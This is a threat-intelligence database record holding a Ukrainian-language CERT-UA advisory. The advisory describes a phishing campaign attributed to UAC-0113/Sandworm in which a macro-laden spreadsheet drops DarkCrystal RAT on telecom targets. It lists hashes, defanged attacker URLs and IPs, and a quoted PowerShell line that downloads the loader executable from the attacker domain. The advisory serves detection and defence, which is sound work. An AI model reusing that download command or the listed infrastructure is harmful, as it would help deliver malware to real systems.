{ "id": "5944f8c3-8fdd-472b-baee-815397df3584", "created_at": "2026-04-06T00:21:08.165361Z", "updated_at": "2026-04-10T03:30:30.428175Z", "deleted_at": null, "sha1_hash": "6eaf27259e79aa58ef2962c3c7b0f6d479aa7ee9", "title": "CERT-UA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2092733, "plain_text": "CERT-UA\r\nArchived: 2026-04-02 10:57:44 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA отримано\r\nінформацію щодо розповсюдження електронних листів з темою \"Безоплатна первинна правова допомога\"\r\nта вкладенням \"Алгоритм дій членів сім’ї безвісти відсутнього військовослужбовця LegalAid.rar\", яке\r\nзахищеним паролем, з електронної адреси в домені gov.ua (вірогідно, скомпрометованої).\r\nЗазначений RAR-архів містить документ \"Алгоритм_LegalAid.xlsm\", що присвячений питанням отримання\r\nправової допомоги. У разі відкриття документу та активації макросу буде виконанно PowerShell-команду,\r\nяка забезпечить завантаження та запуск .NET-завантажувача \"MSCommondll.exe\". Згаданий виконуваний\r\nфайл, у свою чергу, здійснить завантаження та запуск шкідливої програми DarkCrystal RAT.\r\nВиходячи з email-адрес отримувачів електронних листів, а також домену управління DarkCrystal RAT\r\nприпускаємо, що атака спрямована у відношенні операторів та провайдерів телекомунікацій України. Під\r\nчас попередньої атаки, 10.06.2022, об'єктами заінтересованості зловмисників були медійні організації\r\nУкраїни (CERT-UA#4797).\r\nАктивність відстежується за ідентифікатором UAC-0113.\r\nІндикатори компрометації\r\nФайли:\r\n2fe9e49143b5a5d7a2ac38c1c56cbf21 183a05f7a69bba3f9ec7df8abd50f5fd89246da7e732c19842a1a1eecc78f96f\r\nb726312450e28faa38396736be1b00fb 2b2438aa8da7c23e714f2d7a196d82ed52914c9353ef9fded01448216bd858ff\r\nfd2e0ec9021783dba1c9744fa730e5b9 471af7ed687ef875c6118ec2f440f0dea9a434b54d81b7946f58505676f7c589\r\n19bbb1b94f66609cbd80945c14486e93 7cffb54cb07db2f4104b8764ff15799111d06ea81d9c74c09134c61341d74202\r\n8fc587099c54491749b2b65176f4a145 96444376dfd650f8c994116f90be1cacbd337ebdcbafe922910645cb7549ace2\r\nМережеві:\r\nhXXp://plexbd[.]net/MSCommonDriver.exe\r\nhXXp://plexbd[.]net/MSCommondll.exe\r\nhXXps://datagroup.ddns[.]net/PythonHttpGeolongpolldefault.php\r\nplexbd[.]net\r\ndatagroup.ddns[.]net\r\n103[.]27.202.127 (Received)\r\n203[.]96.191.70\r\nhttps://cert.gov.ua/article/405538\r\nPage 1 of 2\n\n31[.]7.58.82\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93\r\nХостові:\r\n(New-object Net.WebClient).DownloadFile('hXXp://plexbd.net/MSCommondll.exe','C:\\Users\\Public\\MSCommon\r\nC:\\Users\\Public\\MSCommondll.exe\r\nc:\\Users\\public\\new.bat\r\nDCR_MUTEX-PNY1ZVhO2iPJoDxTnEBp\r\nГрафічні зображення\r\nSource: https://cert.gov.ua/article/405538\r\nhttps://cert.gov.ua/article/405538\r\nPage 2 of 2", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "references": [ "https://cert.gov.ua/article/405538" ], "report_names": [ "405538" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434868, "ts_updated_at": 1775791830, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6eaf27259e79aa58ef2962c3c7b0f6d479aa7ee9.pdf", "text": "https://archive.orkl.eu/6eaf27259e79aa58ef2962c3c7b0f6d479aa7ee9.txt", "img": "https://archive.orkl.eu/6eaf27259e79aa58ef2962c3c7b0f6d479aa7ee9.jpg" } }